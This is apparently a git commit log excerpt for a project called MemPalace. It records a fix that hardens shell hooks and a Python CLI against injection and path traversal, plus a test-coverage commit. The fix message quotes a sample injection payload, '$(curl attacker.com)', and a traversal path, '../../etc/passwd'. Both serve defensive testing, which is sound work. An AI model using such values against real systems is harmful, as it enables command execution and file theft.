 BLUDATA\marcio.heiderscheidt
|
0f217f7c80
|
fix: harden hooks against shell injection, path traversal, and arithmetic injection
save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
to prevent command substitution via poisoned state files
hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
invalid paths instead of opening arbitrary files
Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field
Refs: MemPalace/mempalace#809
|
2026-04-14 07:54:42 -03:00 |
|
|
Tal Muskal
|
03e9b57108
|
test: add comprehensive test coverage (35% → 58%, threshold 50%)
Add 180+ new tests across 10 test files covering previously untested modules:
- instructions_cli (0% → 100%), hooks_cli (73% → 96%), spellcheck (28% → 84%)
- palace_graph (9% → 91%), general_extractor (0% → 92%), entity_detector (0% → 69%)
- entity_registry (0% → 70%), room_detector_local (0% → 55%), layers (0% → 28%)
- onboarding (0% → 36%)
Also fixes Windows encoding bug in onboarding.py (write_text without encoding="utf-8").
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
|
2026-04-08 20:54:56 +03:00 |
|